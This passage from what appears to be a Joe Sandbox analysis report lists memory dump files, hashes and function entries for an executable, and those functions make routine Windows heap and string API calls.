                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                        • Instruction ID: 2d1bef405d7cfb3846757791ce6190d270f5984144e6dbcad9d7d129a98a2a47
                                                                                                                                                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                        • Instruction Fuzzy Hash: E831AD33A1CA46C6FB24DF75A8443B872A0EF44B50F444131EA8D86291DF3EEA49C70A
                                                                                                                                                                        Function 00007FF6E94306C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                        • Instruction ID: 9413b77cc577ea127f21def1436a65c560e4248cdff187de32ad99cfebdd5d5d
                                                                                                                                                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D414CB3A19742C6EA158F20E44827EB7A0FF85B80F548634DA4D83755DF3EE448C74A